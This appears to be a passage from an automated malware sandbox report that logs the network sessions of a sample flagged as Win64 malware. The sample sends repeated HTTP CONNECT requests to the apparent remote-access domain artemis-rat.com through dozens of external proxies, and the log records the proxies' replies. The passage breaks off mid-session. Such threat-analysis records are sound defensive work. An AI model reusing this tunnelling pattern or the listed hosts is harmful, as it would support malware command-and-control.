                                              Mar 11, 2024 08:37:21.608047962 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b0 71 7c 4f 19 3b 07 b5 d3 2d 82 af 44 9d d6 67 2d b5 1c a4 73 fb e5 b7 ff 57 7a 31 5d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lheq|O;-Dg-sWz1]*,+0/$#('=<5/artemis-rat.com#!)[T<0'n)-F)R@Gf>Q9R:7PZ+bn


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              966192.168.2.453111104.27.83.183807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.277910948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.443022966 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              967192.168.2.452981163.172.131.178163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.278116941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069474936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054311037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.866751909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554235935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366651058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.069550991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.366482019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              968192.168.2.45294254.233.119.17231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.278517008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.604901075 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              969192.168.2.453052129.213.150.205807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.281559944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.496850014 CET716INHTTP/1.1 405 Not Allowed
                                              Server: nginx/1.23.4
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 559
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.23.4</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              970192.168.2.45289752.172.1.186807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.295933962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.261795998 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              971192.168.2.452994150.230.96.150192917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.296186924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069363117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              972192.168.2.453139104.16.213.202807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.302058935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.456701994 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              973192.168.2.45247645.11.95.16560317284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.306574106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.035408020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054549932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257194042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366489887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              974192.168.2.452955216.9.224.113807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.316939116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.667257071 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              975192.168.2.452959185.219.133.10631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.318380117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.663444042 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              976192.168.2.45096151.79.87.144225007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.318397045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.434732914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.467385054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.508630991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.569494009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.584995985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.631858110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.631848097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:21.631875992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              977192.168.2.453133162.159.242.159807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.319153070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.480670929 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              978192.168.2.452360102.130.125.86807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.342504978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366714954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366544008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366457939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.463992119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.460272074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.460308075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.460310936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:21.460024118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              979192.168.2.453104154.205.152.9690807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.342506886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.556276083 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              980192.168.2.453088209.121.164.50311477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.346848965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069361925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.439173937 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              981192.168.2.450966107.148.201.157807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.348110914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435064077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
